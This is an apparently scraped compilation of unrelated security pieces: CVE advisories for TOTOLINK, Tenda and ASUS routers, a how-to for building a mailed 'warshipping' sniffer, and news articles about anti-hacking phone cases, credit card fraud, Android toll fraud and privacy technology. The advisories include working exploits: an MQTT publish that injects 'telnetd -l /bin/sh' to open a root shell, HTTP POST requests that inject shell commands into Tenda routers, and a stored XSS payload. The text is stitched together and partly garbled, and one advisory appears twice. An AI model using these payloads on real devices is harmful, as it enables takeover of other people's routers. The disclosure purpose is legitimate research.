TOTOLINK EX300_V2 V4.0.3c.7484 was discovered to contain a command injection vulnerability via the langType parameter in the setLanguageCfg function. This vulnerability is exploitable via a crafted MQTT data packet.

**Information**

**Vendor of the products:**    TOTOLINK

**Vendor's website:**    http://www.totolink.cn

**Reported by:**    WangJincheng(wjcwinmt@outlook.com) & ShaLetian(ltsha@njupt.edu.cn)

**Affected products:**    TOTOLINK EX300\_V2

**Affected firmware version:** V4.0.3c.7484

**Firmware download address:** http://www.totolink.cn/data/upload/20210720/b351052836a4fc7e1575dc513afc02b1.zip

**Overview**

TOTOLINK EX300_V2 V4.0.3c.7484 has a command injection vulnerability detected at function setLanguageCfg. Attackers can send a MQTT data packet and inject evil commands into parameter langType to execute arbitrary commands.

**Show the product**

TOTOLINK EX300_V2 is a Wi-Fi repeater made in China.

**Vulnerability details**

The vulnerability is detected at /bin/cste_modules/global.so.

In the function setLanguageCfg, the content obtained by program through parameter langType given by MQTT data packet is passed to variable Var. Then, the variable Var is formatted into v9 through the function sprintf without any check. Finally, v9 is passed as an argument to the function CsteSystem which can execute system commands.

Above all, attackers can send a MQTT data packet and inject evil commands into parameter langType to execute arbitrary commands.

**POC**

import paho.mqtt.client as mqtt

client \= mqtt.Client()
client.connect("192.168.0.254", 1883, 60)
client.publish("totolink/router/setLanguageCfg", '{"langType": "$(telnetd -l /bin/sh)"}')

**Get shell**

At first, we run the above script to exploit the vulnerability.

Then, we scan ports and dectect that the port 23 which represents Telnet service has been opened.

Finally, we telnet into the Wi-Fi repeater through port 23 and control it successfully.

CVE-2022-32449: CVE/README.md at main · winmt/CVE

By Deeba Ahmed
Israeli Mobile Cybersecurity Startup Cirotta has launched smartphone cases that the company claims to provide complete protection while…
This is a post from HackRead.com Read the original post: Mobile Cybersecurity Firm Cirotta Launches Anti-Hacking Phone Cases

****Israeli Mobile Cybersecurity** **Startup Cirotta has launched smartphone cases that the company claims to provide complete protection while allowing full operation of devices.****

Tel Aviv, Israel-based startup Cirotta has introduced a ground-breaking method to prevent mobile phone hacking and data privacy breaches. The company explained in a press release that it has successfully converted smartphone cases into full-fledged electronic security devices.

**A Novel Idea**

Undoubtedly, turning phone cases into electronic security gadgets is a unique idea to create a security barrier between threat actors and smartphone data. According to Cirotta, these phone cases offer foolproof security to the phone without impacting the device’s normal operations.

**Target Consumers**

The case price starts at $200, which is quite expensive for a phone case. However, it is worth investing in protecting your data. The cases’ target audiences currently include security, government, and military institutions/officials, high-profile executives, and VIPs.

For your information, Cirotta specializes in creating advanced anti-surveillance technologies for smartphones.

**Anti-Hacking Phone Case Detailed Overview**

According to Cirotta, these anti-hacking phone cases are backed up by six patents. These are available in numerous configurations to meet the diverse needs of smartphone users.

Moreover, these cases are non-device or network-specific and function independently. Another great feature is that the cases are well-designed and aesthetically pleasing. Regarding their capabilities, Cirotta explained that the case blocks camera lenses to prevent threat actors from accessing cameras and spying on the user.

Furthermore, these prevent undesired conversation tracking/recording, thwart operating system hacking or data sweeping when the phone is turned on, and use highly advanced security algorithms to evade the phone’s active noise filtering mechanism.

The cases can also prevent hackers from abusing microphones remotely and block location tracking by overriding the GPS data. That’s not all; the anti-hacking cases can nullify monitoring of Wi-Fi and Bluetooth connections and offset Near-field communication (NFC).

**Two Models Available in Anti-Hacking Cases**

The cases are available in two models- Athena and Universal. Athena is compatible with a broad range of high-end smartphone models, including the iPhone 12 Pro, iPhone 13 Pro, Samsung Galaxy S22, and upcoming models in these series.

Currently, Athena Silver is available that can block the device’s camera and mic. Athena Gold will be launched soon with the capability of securing the device’s Wi-Fi, GPS, and Bluetooth connectivity, among other features.

Conversely, the Universal model is compatible with almost all smartphone models. You can choose between Universal Gold, Silver, and Bronze model. Bronze can only block the phone’s camera, Silver can block the camera and mic, and Gold can block all transmissible data points such as camera, mic, GPS, Wi-Fi, and Bluetooth. This model will be available from August 2022.

**More Anti-Surveillance & Anti-Hacking Tools**

*   Anti-surveillance mask enables you to pass as someone else
*   Meet IRpair & Phantom; powerful anti-facial recognition glasses
*   These Anti-Surveillance Tools Will Protect Activists and Their Privacy
*   New anti-facial recognition glasses protect users’ privacy from CCTV
*   SnoopSnitch — An App That Detects Govt’s Stingray Mobile Trackers

Mobile Cybersecurity Firm Cirotta Launches Anti-Hacking Phone Cases

Here's how I did it and how you can protect your company against such physical/digital hybrid attacks.

Most companies have strategies in place to educate employees about network security. But there has been a lot less awareness and education on how to reduce "phygital" risks — that is, physical devices that launch digital attacks against a company's computer networks.

Another name for these phygital attacks is "warshipping." Essentially, a malicious hacker creates an Internet-enabled device — for example, a miniature computer — and sends it through physical mail in an attempt to compromise a company's computer network. What's more, because so many employees have yet to return to their physical offices post-lockdown, these devices can easily sit for months unattended in unopened mail on desks and in mailrooms, gathering data and exploiting vulnerabilities in a company's network.

It's frighteningly easy and inexpensive to make your own DIY version of a warshipping device. With just three hours, a couple of hundred dollars, and a few YouTube videos, nearly anyone can do it. To show you exactly how easy it is, I'm going to talk about how I built a warshipping device and then discuss what you can do to protect your company against these attacks.

**Building a Warshipping Device**

Prepare yourselves for a bit of a technical jump into hardware and software. We don't have the space here to go into every aspect of building a warshipping device, but the following should give you a harrowing sense of exactly how easy and inexpensive the process can be.

**Building hardware.** The foundation of any warshipping device is as simple as a hobbyist circuit board not much bigger than a credit card, which can operate like a miniature computer. One example is a Raspberry Pi, which is easily found online and arrives with the required software, or at least software that can also be easily found online.

Next you need a Wi-Fi dongle of some kind so your warshipping device can connect to the Internet wirelessly. A USB Wi-Fi adapter and a memory card with at least 32 GBs of storage, along with a SIM card to enable a cellular connection and optional GPS device, will complete the hardware requirements.

**Software prerequisites.** Raspberry Pis have their own Ubuntu-based operating system (OS) called Raspberry Pi OS.

Next you'll need to establish remote access. You need to find your device's IP address so you can connect to it through your computer or another device. To do that, you can run a scan on your local network or use a smartphone app. Next enter the default password for a Raspberry Pi, which is "raspberry." You now have a functional warshipping device.

**Ready for warshipping.** At last you can install your software for warshipping. Your actual warshipping software comes in two parts: your optional GPS software if you want to keep track of your device location and Kismet or a similar network-detecting software.

Kismet acts as a packet sniffer, which finds and captures packets of data from a network to store or forward that information. So Kismet can potentially be used to grab data from your network.

Your device is now ready to cause a world of pain for some poor IT team. All you have to do is send it in the mail, and when it arrives you can access sensitive data or find a vulnerable access point for an attack via the cellular connection. Then you could join the realm of malicious hackers who are costing companies worldwide $2.9 million every minute due to cybercrime.

**Key Takeaways**

So what are some useful takeaways from all of this?

First, you need to realize that this threat isn't going away. These attacks are simply too easy to launch and too hard to address. After all, who has the time to sort through all of that incoming mail as soon as it arrives?

Second, you need to develop phygital security measures as part of your overall cybersecurity efforts. Packages can sit in mailrooms for weeks — or these days, months — before someone processes them. Any of those packages could contain a warshipping device that can use their idle time gathering data from your network. Because warshipping devices can be small enough to fit between two pieces of cardboard, even an opened empty box you're saving in the mailroom to be reused at a later date could be a threat. 

To address the issue, you can start by immediately processing packages that are incorrectly addressed, since these will get returned to the sender. But you should go beyond that to process all unopened mail as quickly as possible and never retain used packaging materials in the mailroom. You can also look into the latest mail-scanning technology, which can detect these devices while avoiding the harmful effects of X-rays.

Third, network discovery software can help you pick up on unusual traffic and detect any new devices the minute they connect to your network. That means you can potentially detect a warshipping device before any damage is done. In addition, the wave of layoffs in the recent Great Resignation, insider threats from individuals who are or formerly were authorized users in your network are just as common and may be harder to detect, since these people may have access to approved credentials and devices.

Fourth, educate your employees. They likely have no idea that packages they left on their desks for a few days while they were working remotely could have a warshipping device inside, so do them and yourselves a favor by alerting them to the possible threat.

If there's one thing you've learned from this article, it should be that the phygital world is a dangerous place. But just knowing about the danger is half the battle. So now you know.

I Built a Cheap 'Warshipping' Device in Just 3 Hours — and So Can You

Tenda AX1803 v1.0.0.1_2890 was discovered to contain a command injection vulnerability via the function setipv6status.

#_**\* Tenda ax1803 has a command injection vulnerability\***_

##\* \* \* \\ \* overview\*\*\*\*

• \*\*\*\*\* type \\ \*\*\*\*: command injection vulnerability

• \* \* \* \\ \* supplier \\ \* \* \* \*: Tengda（ https://tenda.com.cn ）

• \*\*\*\*\* product \*\*\*\*: WiFi router ax1803

• _**\*Firmware download address：\***_ https://www.tenda.com.cn/download/detail-3225.html

• \*\*\*\*Firmware download address：\*\*\*\*https://down.tenda.com.cn/uploadfile/AX1803/US\_AX1803v2.1br\_v1.0.0.1\_2890\_CN\_ZGYD01.zip

Tendaax1803 router adopts WiFi 6 (802.11ax) technology, and the dual band concurrency rate is up to 1775mbps (2.4ghz:574mbps, 5ghz:1201mbps). Compared with the ac1200 router of the previous generation WiFi 5 standard, the wireless rate is increased by 50% and the transmission distance is longer; Equipped with 1.5GHz high-performance quad core processor, the network load capacity is comprehensively improved, data forwarding is faster, and long-term operation is more stable; Using ofdma+mu-mimo technology, more devices can access the Internet at the same time, the transmission efficiency is significantly improved, the delay is significantly reduced, and the online games and ultra clear videos for multiple people are more fluent. It is the first choice for building a multimedia home network! Command Execution Vulnerability in setipv6status

##\* \* \* \\ \* description\*\*\*\*

###_**\* I. product information:\***_

Overview of the latest version of Tenda ax1803 router simulation:

\### _**\*2. Vulnerability details\***_

Tenda ax1803 is found to have a command injection vulnerability in the setipv6status function

When we set connect type = ' PPPoE ', we will get a command injection vulnerability after logging in.

\## _**\*3. Recurring vulnerabilities and POCS\***_

To reproduce the vulnerability, the following steps can be followed:

Start firmware through QEMU system or other methods (real machine)

Attack with the following POC attacks

Note to replace the password field in the cookie

    POST /goform/setIPv6Status HTTP/1.1
    Host: 192.168.2.1
    Connection: close
    Content-Length: 191
    sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="98", "Google Chrome";v="98"
    Accept: */*
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.109 Safari/537.36
    sec-ch-ua-platform: "macOS"
    Origin: https://192.168.2.1
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: https://192.168.2.1/main.html
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: password=edeff4d6d98974e46457a587e2e724a2ndy5gk
    
    IPv6En=1&conType=PPPoE&ISPusername=addasdas&ISPpassword=$(ls > /tmp/xxx)&prefixDelegate=0&wanAddr=%2F&gateWay=&lanType=undefined&wanPreDNS=&wanAltDNS=&lanPrefix=undefined%2F64

CVE-2022-34595: IOT_Vul/readme_en.md at main · zhefox/IOT_Vul

Tenda AX1806 v1.0.0.1 was discovered to contain a command injection vulnerability via the function WanParameterSetting.

**\*\*\* Command Injection Vulnerability in Tenda AX1806 \*\*****_**\*Overview\***_**

*   _**\*Type\***_: Command Injection Vulnerability
    
*   _**\*Supplier\***_: Tenda ( https://tenda.com.cn )
    
*   \*\*\*Product\*\*: WiFi router AX1806
    
*   Firmware download address: \*\*\*\* https://www.tenda.com.cn/download/detail-3306.html
    
*   Firmware download address: \*\*\*\* https://down.tenda.com.cn/uploadfile/AX1806/US\_AX1806V21brv1001cn2988ZGDX01.zip
    

Tenda AX1806 uses a new generation of WIFI6 (802.11ax) technology, and combines higher number of subcarriers and 1024QAM modulation technology. Compared with wifi-5 routers, dual-band wireless internet access rate is greatly improved. WanParameterSetting has a Command Execution Vulnerability

**_**\*Description\***_****\*_**1, Product Information:\***_**

Overview of the latest version of Tenda AX1806 router simulation:

\### \*_**2\. Vulnerability Details\***_

Tenda AX1806 was found to have a command injection vulnerability in the WanParameterSetting function

The non-zero is true, and when we change the adslPwd parameter, we get a command injection vulnerability after setting it.

**_**\*3. Recurring loopholes and POC\***_**

To reproduce the vulnerability, the following steps can be followed:

Start firmware (real machine) via qemu-system or other means

Attack using the following POC attacks

Note the replacement of password fields in cookies

    POST /goform/WanParameterSetting?0.8762489734485668 HTTP/1.1
    Host: i92.168.68.150
    Connection: close
    Content-Length: 191
    sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="98", "Google Chrome";v="98"
    Accept: */*
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.109 Safari/537.36
    sec-ch-ua-platform: "macOS"
    Origin: https://i92.168.68.150
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: https://192.168.2.1/main.html
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: password=edeff4d6d98974e46457a587e2e724a2ndy5gk
    
    wanType=2&adslUser=aaaa&adslPwd=$(ls > /tmp/xxx)&vpnServer=&vpnUser=&vpnPwd=&vpnWanType=l&dnsAuto=1&staticIp=&mask=&gateway=&dnsl=&dns2=&module=wanl&downSpeedLimit=

CVE-2022-34597: IOT_Vul/readme_en.md at main · zhefox/IOT_Vul

Tenda AX1803 v1.0.0.1_2890 was discovered to contain a command injection vulnerability via the function WanParameterSetting.

#_**\* Tenda ax1803 has a command injection vulnerability\***_

##\* \* \* \\ \* overview\*\*\*\*

• \*\*\*\*\* type \\ \*\*\*\*: command injection vulnerability

• \* \* \* \\ \* supplier \\ \* \* \* \*: Tenda（ https://tenda.com.cn ）

• \*\*\*\*\* product \*\*\*\*: WiFi router ax1803

• _**\* firmware download address:\***_ https://www.tenda.com.cn/download/detail-3225.html

• _**\* firmware download address:\***_ https://down.tenda.com.cn/uploadfile/AX1803/US\_AX1803v2.1br\_v1.0.0.1\_2890\_CN\_ZGYD01.zip

Tendaax1803 router adopts WiFi 6 (802.11ax) technology, and the dual band concurrency rate is up to 1775mbps (2.4ghz:574mbps, 5ghz:1201mbps). Compared with the ac1200 router of the previous generation WiFi 5 standard, the wireless rate is increased by 50% and the transmission distance is longer; Equipped with 1.5GHz high-performance quad core processor, the network load capacity is comprehensively improved, data forwarding is faster, and long-term operation is more stable; Using ofdma+mu-mimo technology, more devices can access the Internet at the same time, the transmission efficiency is significantly improved, the delay is significantly reduced, and the online games and ultra clear videos for multiple people are more fluent. It is the first choice for building a multimedia home network! Command Execution Vulnerability in wanparametersetting

**_**\*Description\***_****\*_**1, Product Information:\***_**

Overview of the latest version of simulation for Tenda AX1803 router:

**\*_**2\. Vulnerability Details\***_**

Tenda AX1803 was found to have a command injection vulnerability in the WanParameterSetting function

The non-zero is true, and when we change the adslPwd parameter, we get a command injection vulnerability after setting it.

\## _**\*3. Recurring loopholes and POC\***_

To reproduce the vulnerability, the following steps can be followed:

Start firmware (real machine) via qemu-system or other means

Attack using the following POC attacks

Note the replacement of password fields in cookies

    POST /goform/WanParameterSetting?0.8762489734485668 HTTP/1.1
    Host: i92.168.68.150
    Connection: close
    Content-Length: 191
    sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="98", "Google Chrome";v="98"
    Accept: */*
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.109 Safari/537.36
    sec-ch-ua-platform: "macOS"
    Origin: https://i92.168.68.150
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: https://192.168.2.1/main.html
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: password=edeff4d6d98974e46457a587e2e724a2ndy5gk
    
    wanType=2&adslUser=aaaa&adslPwd=$(ls > /tmp/xxx)&vpnServer=&vpnUser=&vpnPwd=&vpnWanType=l&dnsAuto=1&staticIp=&mask=&gateway=&dnsl=&dns2=&module=wanl&downSpeedLimit=

CVE-2022-34596: IOT_Vul/readme_en.md at main · zhefox/IOT_Vul

By Owais Sultan
Credit card fraud happens when someone steals your credit information and uses it to make purchases or borrow…
This is a post from HackRead.com Read the original post: Protection Against Online Scams: How to Keep Your Credit Safe

Credit card fraud happens when someone steals your credit information and uses it to make purchases or borrow money. While victims of fraud don’t typically have to pay anything, the situation can take time and effort to sort out.

Reporting stolen cards and waiting around for your new one to be delivered in the mail can feel like a hassle. However, you can take steps to protect your card from everyday threats. Keep reading to learn six ways to keep your credit card safe.

**1\. Use Two-Factor Authentication**

Whether you use a credit builder card or a traditional credit card, your card’s mobile app likely has two-factor authentication. This second layer of safety provides added protection. Typical passwords can be easy to guess and shouldn’t be your only form of security. Enabling two-factor authentication makes it harder for people with ill intentions to access your information.

Once you have two-factor authentication turned on, the mobile app will require two types of information to access your account. One of these will be your password. The other will be a code sent to your phone or biometric data like face recognition or a fingerprint. So, even if your password is leaked, no one can access your information without a second form of verification.

**2\. Shop on Your Device with a Private Network**

The library isn’t the best place to do your online shopping. Public devices, like library computers or hotel lobby tablets, save your login information, making it available to the next user. Logging out of your accounts won’t protect you either. If hackers have installed spyware on the device, they can access your credit card numbers, usernames, and passwords.

While using a personal device offers some protection, cybercriminals can still access your information if you’re using public Wi-Fi. Public Wi-Fi networks may be convenient, but they’re insecure, so it’s best to treat them with caution. If you can, use your personal hotspot instead.

**3\. Use Unique Passwords**

If you’re like most people, you use the same password across multiple accounts. With so many digital accounts to manage, using the same password may help you remember your login information.

However, it also makes your credit card account easier to hack. When you use the same password all the time, you increase your risk of credential stuffing. This happens when criminals use information stolen from one account to try and gain access to the rest of your accounts.

To protect your credit card information from credential stuffing, your online banking passwords should be unique. A good rule of thumb when creating passwords is to combine upper and lowercase letters with numbers and symbols.

Moreover, start using a password manager to help you manage different, complex passwords across multiple accounts. Password managers safely store all your online passwords, so you don’t have to remember them.

**4\. Watch Out for Phishing**

If you get a call or receive an email requesting your credit card information, do not respond. It’s likely a scammer trying to trick you with a phishing scheme. Phishing is when someone calls or emails you requesting your personal information. These scammers can be tricky and use familiar company names to make it appear as if they’re someone they’re not.

To help protect yourself from phishing, maintain a healthy level of suspicion when you receive requests for personal information. Your bank will never call you to verify account information, so don’t provide credit card information on a call you didn’t initiate. If you receive an email from an address you don’t recognize, don’t click any links and report it immediately.

**5\. Look for Card Skimming**

Skimming is a method of theft criminals use to steal your credit card information at the time of use. This is commonly done through a device attached to a point-of-purchase machine like an ATM or gas pump. These little devices are typically placed over the card reader and are challenging to spot.

While it may be difficult to see a skimming device, there are a couple of things you can do to protect yourself. First, examine any card reading machine before using it. If the graphics look misaligned on the reader or if it seems loose or crooked, it may have been tampered with. Another way to avoid skimming is simply to pay inside when purchasing gas. This completely eliminates the chances of getting skimmed.

**6\. Act Quickly**

If your wallet is stolen or your credit card goes missing, acting quickly can help minimize the damage. First thing’s first, you need to report the theft to your card issuer. Then, they will cancel your old card and send you a replacement in the mail.

If there were any fraudulent charges made on your account, you should receive a refund. The Fair Credit Billing Act protects people from credit card fraud, setting your maximum liability at $50. After receiving your credit card statement, confirm that the information is accurate.

Credit card fraud is frustrating to deal with, but it doesn’t have to happen. By taking the proper steps to protect yourself, you can significantly reduce your chances of becoming a victim.

**More Card Security News**

*   New credit card skimmers channel funds through Telegram
*   Over 500 Magento sites hacked in payment skimmer attack
*   Largest dark web market for stolen cards UniCC calls it quits
*   Bluetana app detects gas pumps card skimmers in 3 seconds
*   Cloud video platform abused in skimmer attack against real estate sites

Owais takes care of Hackread's social media from the very first day. At the same time He is pursuing for chartered accountancy and doing part time freelance writing.

Protection Against Online Scams: How to Keep Your Credit Safe

By Deeba Ahmed
Those still using older versions of the Android operating system are at risk. Microsoft’s 365 Defender team has detected a…
This is a post from HackRead.com Read the original post: Microsoft Warns of Evolving Toll Fraud Android Malware Draining Wallets

****Those still using older versions of the Android operating system are at risk.****

Microsoft’s 365 Defender team has detected a new and evolving Android malware that targets users’ crypto wallets to steal funds without raising suspicion. According to researchers; the malware hunts for devices still using older versions of Android OS.

Toll fraud falls into a billing fraud subcategory that automatically signs the user for a premium service without asking for user content. Since it is continuously evolving, researchers regard it as dangerous Android malware.

**A Novel Fraud**

The malware has a unique attack approach compared to other billing frauds such as call or SMS fraud. Where other types of scams utilize standard attack flow involving making calls or sending messages to premium numbers, toll fraud uses a complicated multi-step attack flow, which the malware developers are continually improving.

Furthermore, Microsoft explained that the malware targets “specific network operators” and performs its routines only if the device is subscribed to one of its approved network operators. And it uses cellular data for its malicious operations by default. In fact, it forces devices to connect to a mobile network even when a Wi-Fi connection is available.

**Attack Scenario**

According to the findings shared by Microsoft’s researchers, the evolving toll fraud scheme exploits the Wireless Application Protocol (WAP) billing mechanism to target Android users. For your information, applications use WAP to charge users for paid content via their mobile phone bills. But, the malware can easily enroll the user in premium services since it utilizes cellular networks to function.

The attack chain commences when the user disconnects from a Wi-Fi network and connects to a mobile network. The Android malware quickly launched the subscription page and automatically subscribed the user to the service.

Once this is done, the malware reads a one-time password (OTP), if any, and fills the required fields to finish the subscription process. The attackers then disguise this activity by disabling SMS notifications.

**Possible Dangers**

According to Microsoft’s blog post, Toll fraud poses numerous risks, including the unwanted increase in your monthly phone bill. Since the malware hides behind legitimate apps requiring a wide range of permissions, it becomes impossible to detect it. It hides behind apps requesting SMS permissions, personalization, editing access, and communication-related privileges. Such as wallpaper or lock screen apps, chat/messaging apps, fake antivirus, and cleaner and camera apps.

It must be noted that the malware targets phones running Android 9 or older versions. This means mobile phones using Android version 10 or higher are safe. Still, it is recommended to install antivirus apps for added protection and avoid installing apps from 3rd-party sources.

**More Android Malware News**

*   Play Store Apps Caught Spreading Android Malware to Millions
*   Watch out as new Android malware spreads through WhatsApp
*   Microsoft warns of new Android ransomware blackmailing victims
*   Web3 Backdoor Wallets Steals Seed Phrases from iOS/Android Phones
*   New Russian Android Malware Tracks GPS Location and Spies on Victims

Microsoft Warns of Evolving Toll Fraud Android Malware Draining Wallets

ASUS RT-A88U 3.0.0.4.386_45898 is vulnerable to Cross Site Scripting (XSS). The ASUS router admin panel does not sanitize the WiFI logs correctly, if an attacker was able to change the SSID of the router with a custom payload, they could achieve stored XSS on the device.

While studying for my master's degree in cyber security, I co-authored a paper regarding the rollout of IoT devices and the security considerations that businesses need to address to ensure these devices are secure. The paper underscored how a large majority of IoT devices used vulnerable components and did not follow basic secure programming principles.

As I was setting up my own new internal network in September 2021, I stumbled upon various logging functionalities within the custom deployment of DD-WRT that raised questions in my mind. DD-WRT, or in this case ASUSWRT, is a custom-developed Linux-based operating system for consumer router/modem products. Developed internally by ASUSTek, ASUSWRT builds on the standard DD-WRT distribution with a custom web interface and additional features, such as ASUSTek AiMesh networking products. The web front-end is programmed in ASP, which acts as a user interface for controlling various settings within the NVRAM of the device.

I had previously looked at router firmware but never found any vulnerabilities as such. Intrigued by the potential security-related issues that could occur if my router was hijacked, I set one of my Wi-Fi radios to a basic XSS payload to see if it had been sanitized...

“><script>alert(1)</script>

Nope, no popup...

I moved on, considering that there would be no way an XSS would be present within a software package that is so widely deployed across the world, until...

A few days later, my ISP was playing up, so I logged in to the router and navigated to the log section of the platform to see if there were any issues on my side with the router. I quickly clicked through the menus provided, one being “Wireless logs.” I suddenly had a JavaScript popup in my browser window: My original XSS had fired under the log page.

Win!

**Why Does This Matter?**

ASUS routers have a functionality named **Remote Management** that allows for users to connect back to their home routers over HTTP, over port 8443. This also allows users to attach devices, such as USB pen drives, to their router to effectively turn it into a router/network attached storage combo unit.

An attacker with pre-existing access to a router could use this vulnerability to maintain persistence to the router, even after a password reset/IP address change. An attacker could additionally leverage this exploit to change any setting on the router, including Wi-Fi passwords and DNS servers, and enabling telnet/SSH. **Ultimately, this exploit allows for complete takeover of a compromised router when chained with basic Unix knowledge**.

It would be trivial to create a Shodan search query to pull in all ASUS router products accessible from the internet (Figure 1) (Table 1). Although the user must set their own password from the default one provided by the manufacturer to first access the web admin interface, cybercriminals know all too well that users commonly reuse passwords.

Figure 1 – Exposed ASUS Routers Globally

Vulnerable Firmware/Device – 3.0.0.4.386.46061

All Zen WiFi lineup

RT-AC66U B1 

All 802.11axl lineup

RT-AC66U+

All ROG Rapture lineup

RT-AC1300UHP/ G+

All TUF Gaming lineup

RT-AC1200

RT-AC5300

RT-AC1200G/HP/G+/ E/ GU

RT-AC3100

RT-AC58U

RT-AC88U

RT-AC56U/R/S

RT-AC3200

RT-AC55U

RT-AC2900

RT-AC55UHP

RT-AC2600

RT-AC53

RT-AC2400

RT-AC52U B1

RT-AC2200

RT-AC51U/ U+

RT-AC87U/R

RT-ACRH17

RT-AC86U

RT-ACRH13

RT-AC85U

RT-N66U/R/W/C1

RT-AC85P

RT-N18U

RT-AC65P

RT-N19

RT-AC57U

RT-N14UHP

RT-AC68U/R/P/W/UF

RT-N12E B1/C1

RT-AC65U

RT-N12HP B1

RT-AC1900

RT-N12VP B1

RT-AC1900P/U

RT-N12+ B1

RT-AC1750

RT-N12D1

RT-AC1750 B1 

4G-AC53U

RT-AC66U/R/W

4G-AC68U

Table 1 – Vulnerable Firmware to Devices

**Code Analysis**

I subsequently dumped the firmware from a vulnerable version, accessed via the ASUSTek update page.

Upon downloading the file, you will be presented with a **.trx** file, which is effectively a zip containing the mount points for the operating system. The web front-end is stored within the **/www** folder, and in this case, the vulnerable code is located within the **Main\_WStatus\_Content.asp** file.

This file preforms a GET request to **/wl\_log.asp** upon accessing the page. Within this request, the SSID of the router will also be returned, among data such as MAC addresses, access time for clients, and some other general debug information. The page then uses the following code to convert elements within the log, back to readable format, HTML encoding them in the process:

Function(resp){  
Content = htmlEnDeCode.htmlEncode(resp);  
Content = classObj.UnHexCode(content);  
\--- Snip ---

While this page attempts to decode the information provided by the GET request, in doing so, there is no filtering for malicious content, such as HTML tags. The script then continues and places the data within a <textarea> HTML element; in this case, the XSS payload is processed by the browser and the vulnerability has been exploited. The user’s browser will execute the payload and the attacker has control over the device.

**Vulnerability Submission and Patch Released**

I subsequently contacted ASUSTek on October 28, 2021, at 3:40 p.m. (UTC). The ASUS Security department (“ASUS security”) first requested that I update my firmware version to 386\_45898 to verify that the vulnerability existed on the latest release of the firmware. After updating the software, I confirmed that the firmware was still vulnerable to the exploit.

ASUS security then requested a proof-of-concept script/video of the attack for their internal reference. After I provided a short 20-second clip of the vulnerability in action, ASUS security immediately accepted the submission.

Shortly after sending the proof-of-concept video, I received an email from ASUS security requesting that I install a new beta patch for the router product. After I personally confirmed that ASUS had patched the vulnerability in the beta branch of the firmware, ASUS requested my information so I could be acknowledged in the patch notes of the firmware (Figure 1). The beta firmware was subsequently published as the latest firmware update for the affected products.

Figure 2 – Firmware Patch Notes Acknowledgement

**CVE Assignment**

A CVE was requested for this issue on November 11, 2021, which MITRE subsequently issued on March 28, 2022, as CVE-2021-43702. As of this writing, MITRE has not published further details, but I’ll update this article when more information becomes available.

CVE-2021-43702: CVE-2021-43702 from Discovery to Patch | Kroll

To celebrate Independence Day we're drawing attention to five technologies that could improve life, liberty and the pursuit of happiness on the Internet. 
The post 5 pro-freedom technologies that could change the Internet appeared first on Malwarebytes Labs.

In the digital era, freedom is inextricably linked to privacy. After a good start, the Internet-enabled, technological revolution we are living through has hit some bumps in the road. We have already lost a lot of control over who and what has access to our data, and there are further threats to our freedom on the horizon.

It doesn’t have to be that way though, and it is not inevitable that the trend will continue. To celebrate Independence Day we want to draw your attention to five technologies that could improve life, liberty and the pursuit of happiness on the Internet.

The technologies are listed in a rough order of simplest, soonest, and most likely to happen, to most complex, furthest out, and least likely to happen.

**DNS encryption**

DNS encryption plugs a gap that makes it easy to track the websites you visit.

The domain name system (DNS) is a distributed address book that lists domain names and their corresponding IP addresses. When you visit a website, your browser sends a request to a DNS resolver, which responds with the IP address of the domain you’re visiting. The request is sent in plain text, which is the computer networking equivalent of yelling the names of all the websites you’re visiting out loud.

Anyone, or anything, on the same local network as you can see your DNS lookups, as can your ISP, which will happily sell your browsing history to the highest bidder. And any machine-in-the-middle (MitM) attackers between you and the DNS resolver—such as rogue Wi-Fi access points—can also silently change your plain text DNS requests and use them to direct you to malicious websites.

DNS encryption restores your privacy by making it impossible for anything other than the DNS resolver to read and respond to your queries. You still have to trust the resolver you send your requests to, but the eavesdroppers are out in the cold.

DNS encryption is new, and still relatively rare, but it is supported natively by modern versions of Windows, macOS, Android, and iOS, as well as a number of different DNS clients, proxies and applications, including the DNS Filtering module for the Malwarebytes Nebula platform. It’s ascendancy seems assured.

**Passwordless authentication**

Passwordless authentication could usher in a world where we no longer rely on passwords, and that could be an enormous, unabashed win for security and peace of mind. The trouble is, that has been true for a _very long time indeed_, and it hasn’t happened yet.

There is reason to hope that things are finally about change though.

Passwords are a great idea in theory that fail horribly in practice. Humans are poorly equipped to create and remember them, and demonstrably poor at building systems that handle them securely. And yet almost every Internet account requires one. The inevitable result is an epidemic of poor passwords and an entire criminal industry preying on them with relentless automated attacks.

For a long time, the successor to the password was widely presumed to be some form of biometric authentication—such as face or fingerprint recognition—but nobody could agree which one. With multiple novel, competing, costly, and incompatible alternatives, passwords remained the clear winner.

The solution to that gridlock was FIDO2.

FIDO2 is a specification that uses public key encryption for authentication. This allows users to log in to websites without sharing a secret that needs to be secured like a password. There is nothing for a programmer to secure, nothing for an attacker to guess, and nothing that can be stolen in a data breach.

The sensitive encrpytion work all happens on a device owned by the user, which can be a specialist hardware key, a phone, a laptop, or any other compatible device. FIDO2 doesn’t specify what the device is, or how it should be secured, only that a user must make a “gesture” to approve the authentication. This leaves device manufacturers free to use whatever “gesture” works best for them: PIN numbers, swipe patterns, and any and all forms of biometrics. The end result is a technology that allows you to log in to a website securely using Windows Hello, Apple’s Touch ID, and any number of other methods that exist now or could be created in the future.

